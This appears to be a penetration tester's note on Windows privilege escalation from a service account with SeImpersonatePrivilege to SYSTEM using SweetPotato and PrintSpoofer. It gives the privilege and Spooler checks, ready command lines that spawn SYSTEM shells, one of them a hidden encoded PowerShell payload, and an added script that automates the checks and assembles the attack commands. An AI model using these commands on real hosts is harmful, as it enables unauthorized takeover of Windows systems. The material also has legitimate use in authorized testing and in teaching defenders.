Secondary Categories: 02-Windows Internals, 02-Privilege Escalation
Several techniques exist to escalate from a service account to SYSTEM on a Windows host when the current token holds either of the following privileges: SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege. Service accounts such as IIS application pool identities and the MSSQL service commonly hold SeImpersonatePrivilege.
We can check whether the current user has these privileges with the following command. What matters is that the privilege is present in the output; a privilege listed as Disabled still counts, since the tools enable it themselves.
whoami /priv
Sweet Potato
This tool bundles several privilege escalation techniques that take an attacker from a service account to SYSTEM. It builds on the following work:
- Original RottenPotato code and exploit by @foxglovesec
- Weaponized JuicyPotato by @decoder_it and @Guitro, along with BITS WinRM discovery
- PrintSpoofer discovery and original exploit by @itm4n
- EfsRpc, built on EfsPotato by @zcgonvh and PetitPotam by @topotam
# Exploiting a host with SweetPotato
.\SweetPotato.exe -p C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -a "-w hidden -enc <BASE64_CMD>"
PrintSpoofer
First ensure the Print Spooler service is running, either with the following PowerShell command or via the Windows Services console. PrintSpoofer relies on the Spooler to connect back to a named pipe, so it fails when the service is stopped or disabled; in that case use an EfsRpc-based method instead.
Get-Service Spooler
After transferring the binary (or loading it as a COFF object through your C2), execute the following to spawn a SYSTEM shell. The -i flag makes the process interactive in the current console, and -c sets the command to run.
.\PrintSpoofer.exe -i -c powershell
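The checks above (privileges, then Spooler state) and the command lines for both tools, as one added PowerShell example. This is not code from the original note nor from the SweetPotato or PrintSpoofer projects; the payload string, the output file path and the location of the two binaries are assumptions, and the -e values for SweetPotato follow its built-in help, so confirm them with SweetPotato.exe -h on the build you carry.

```powershell
# Added example: verify the preconditions from the note, then build the matching
# command lines. Binary locations and the demo payload are assumptions.

# 1. Token privileges. The potato family only needs the privilege to be present;
#    a State of "Disabled" is fine, the tool enables it via AdjustTokenPrivileges.
$privNames = whoami /priv | ForEach-Object {
    if ($_ -match '^(Se\w+Privilege)\s') { $Matches[1] }
}
$hasImpersonate = $privNames -contains 'SeImpersonatePrivilege'
$hasAssignToken = $privNames -contains 'SeAssignPrimaryTokenPrivilege'
if (-not ($hasImpersonate -or $hasAssignToken)) {
    Write-Host 'Neither SeImpersonatePrivilege nor SeAssignPrimaryTokenPrivilege is held; the potato techniques do not apply.'
    return
}
Write-Host "SeImpersonatePrivilege: $hasImpersonate  SeAssignPrimaryTokenPrivilege: $hasAssignToken"

# 2. Spooler state decides between PrintSpoofer and the EfsRpc trigger.
$spooler        = Get-Service -Name Spooler -ErrorAction SilentlyContinue
$spoolerRunning = ($null -ne $spooler) -and ($spooler.Status -eq 'Running')
Write-Host "Spooler running: $spoolerRunning"

# 3. Encode the payload the way powershell.exe -enc expects: UTF-16LE, then Base64.
$payload = 'whoami > C:\Windows\Temp\potato.txt'   # assumed demo payload
$encoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($payload))
$psPath  = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'

# 4. Print the command lines to run next (assumed: both binaries sit in the current directory).
if ($spoolerRunning) {
    Write-Host 'PrintSpoofer is an option:'
    Write-Host '  .\PrintSpoofer.exe -i -c powershell'
    $method = 'PrintSpoofer'
} else {
    Write-Host 'Spooler is not running; skip PrintSpoofer and use the EfsRpc trigger.'
    $method = 'EfsRpc'
}
Write-Host 'SweetPotato (-e selects the trigger; EfsRpc does not need the Spooler):'
Write-Host "  .\SweetPotato.exe -e $method -p $psPath -a `"-w hidden -enc $encoded`""
```

The script prints the commands rather than running them so it can be reviewed in the session first; the Base64 step is the one people most often get wrong, since -enc expects UTF-16LE input and an ASCII-encoded string is silently rejected by powershell.exe.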